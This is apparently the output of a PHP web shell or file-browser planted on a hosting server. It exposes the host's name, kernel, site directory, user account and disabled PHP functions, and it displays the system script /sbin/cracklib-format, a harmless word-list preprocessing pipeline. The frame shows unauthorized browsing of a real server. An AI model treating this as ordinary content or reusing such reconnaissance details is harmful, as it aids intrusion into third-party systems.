Uname:Linux m28057.contaboserver.net 6.12.0-211.46.1.el10_2.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 12 09:33:15 EDT 2026 x86_64

Base Dir : /mnt/newhome/tb1/raumausstattung-braun.com

User : tb1


HEX
HEX
Server: Apache
System: Linux m28057.contaboserver.net 6.12.0-211.46.1.el10_2.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 12 09:33:15 EDT 2026 x86_64
User: tb1 (1034)
PHP: 8.3.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //sbin/cracklib-format
#!/usr/bin/sh
#
# This preprocesses a set of word lists into a suitable form for input
# into cracklib-packer
#
# Truncates lines longer than 1022 characters long as cracklib-packer
# does not handle them correctly.
#
# The last part of the pipeline uses 'grep -v' to remove any blank
# lines (possibly introduced by earlier parts of the pipeline) as
# cracklib-packer will generate "skipping line" warnings otherwise.
#
LC_ALL=C
export LC_ALL
gzip -cdf "$@" |
    grep -a -v '^#' |
    tr '[A-Z]' '[a-z]' |
    tr -cd '\n[:graph:]' |
    cut -c 1-1022 |
    grep -v '^$' |
    sort -u